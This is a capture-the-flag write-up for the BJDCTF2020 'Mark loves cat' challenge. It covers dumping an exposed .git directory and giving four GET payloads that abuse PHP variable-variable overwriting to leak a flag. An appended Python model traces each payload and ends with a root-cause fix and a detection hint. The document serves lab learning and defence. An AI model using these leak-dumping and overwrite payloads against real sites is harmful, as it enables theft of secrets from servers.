BUUCTF WEB [BJDCTF2020]Mark loves cat
Date: 2023-05-18 00:37:00
No vulnerability is visible in the page source, so scan with dirsearch; the scan reveals an exposed .git directory.
Use scrabble to dump the leaked repository:
./scrabble http://70f9aaf8-036c-44f0-b1f1-df263f120cfa.node4.buuoj.cn:81/
This recovers flag.php and index.php.
flag.php:
$flag = file_get_contents('/flag');
The main PHP code in index.php:
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_POST as $x => $y){
    $$x = $y;
}
foreach($_GET as $x => $y){
    $$x = $$y;
}
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
    exit($is);
}
echo "the flag is: ".$flag;
Solution 1
?handsome=flag&flag=foo&foo=flag
Pass the parameters via GET. The loop
foreach($_GET as $x => $y){ $$x = $$y; }
then performs, in order,
$handsome=$flag; $flag=$foo; $foo=$flag;
In the next loop,
foreach($_GET as $x => $y){ if($_GET['flag'] === $x && $x !== 'flag'){ exit($handsome); } }
when the iteration reaches
foo=flag
the if branch is entered, and exit prints the flag (which $handsome now holds).
Solution 2
/?yds=flag
Pass the parameter via GET. In the loop
foreach($_GET as $x => $y){ $$x = $$y; }
the $yds variable is overwritten so that its value becomes the value of the $flag variable from flag.php; then
if(!isset($_GET['flag']) && !isset($_POST['flag'])){ exit($yds); }
prints the flag.
Solution 3
?is=flag&flag=flag
Pass the parameters via GET. In the loop
foreach($_GET as $x => $y){ $$x = $$y; }
the $is variable is overwritten while $flag is left unchanged (sending flag=flag via POST would instead change the value of $flag); then
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ exit($is); }
prints the flag.
Solution 4
?1=flag&flag=1
Bypass all three preceding if statements and let the final echo print the flag.
Note:
foreach($_GET as $x => $y){ if($_GET['flag'] === $x && $x !== 'flag'){ exit($handsome); } }
This loop uses a strict comparison: the 1 read from $_GET['flag'] is a string, while the 1 that $x receives (the array key) is an int, so the check does not match and the filter is bypassed.
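As an added example that is not part of the original writeup, the following Python model reproduces the control flow of index.php shown above with a dict standing in for PHP's symbol table, so the effect of `$$x = $y` (POST) and `$$x = $$y` (GET) on each of the four solutions can be traced step by step. The names `run_index`, `php_array_key` and the `FLAG` placeholder (standing in for `file_get_contents('/flag')`) are my own; it also covers the case the writeup mentions under solution 3, where sending flag=flag via POST clobbers $flag, and the int-vs-string array-key detail behind solution 4.

```python
# Added example (not code from the original writeup): a Python model of the
# index.php logic, with a dict standing in for PHP's symbol table so the
# effect of `$$x = $y` / `$$x = $$y` on each payload can be traced.
# FLAG is a constructed placeholder for file_get_contents('/flag').
FLAG = "flag{constructed_sample_value}"


def php_array_key(key):
    """PHP stores array keys that are canonical decimal integer strings
    (e.g. "1", but not "01") as int keys; mimic that for $_GET / $_POST."""
    if isinstance(key, str) and key.isdigit() and (key == "0" or key[0] != "0"):
        return int(key)
    return key


def run_index(get, post=None):
    """Return what index.php would output for the given $_GET / $_POST."""
    post = post or {}
    get = {php_array_key(k): v for k, v in get.items()}
    post = {php_array_key(k): v for k, v in post.items()}

    # Symbol table after `include 'flag.php'` and the three assignments.
    sym = {"flag": FLAG, "yds": "dog", "is": "cat", "handsome": "yds"}

    # foreach($_POST as $x => $y){ $$x = $y; }  -- value taken from the request.
    for x, y in post.items():
        sym[str(x)] = y                   # variable names are always strings in PHP

    # foreach($_GET as $x => $y){ $$x = $$y; }  -- value copied from another variable.
    for x, y in get.items():
        sym[str(x)] = sym.get(str(y))     # an undefined $$y reads as null (None)

    # foreach($_GET ...){ if($_GET['flag'] === $x && $x !== 'flag') exit($handsome); }
    # Python's == between str and int is False, matching PHP's === ("1" !== 1).
    for x in get:
        if get.get("flag") == x and x != "flag":
            return sym.get("handsome")

    # if(!isset($_GET['flag']) && !isset($_POST['flag'])) exit($yds);
    if "flag" not in get and "flag" not in post:
        return sym.get("yds")

    # if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag') exit($is);
    if post.get("flag") == "flag" or get.get("flag") == "flag":
        return sym.get("is")

    return "the flag is: " + str(sym.get("flag"))


if __name__ == "__main__":
    # Constructed inputs: the four payloads from the writeup plus the POST variant.
    payloads = {
        "solution 1": ({"handsome": "flag", "flag": "foo", "foo": "flag"}, {}),
        "solution 2": ({"yds": "flag"}, {}),
        "solution 3": ({"is": "flag", "flag": "flag"}, {}),
        "solution 4": ({"1": "flag", "flag": "1"}, {}),
        "solution 3 with POST flag=flag": ({"is": "flag"}, {"flag": "flag"}),
    }
    for name, (g, p) in payloads.items():
        print(f"{name:32s} -> {run_index(g, p)!r}")
```

Running the model shows solutions 1 to 3 returning the flag through `$handsome`, `$yds` and `$is` respectively, solution 4 reaching the final echo, and the POST variant of solution 3 printing the literal string "flag" because `$$x = $y` overwrote `$flag` with request data. The root cause is that request keys are allowed to choose variable names (`$$x`, and likewise `extract()` on `$_GET`/`$_POST`); the fix is to read only the parameters the script expects into explicitly named variables, and from a monitoring standpoint requests whose parameter names coincide with internal variables (`yds`, `is`, `handsome`) are a useful signal of this overwrite being attempted.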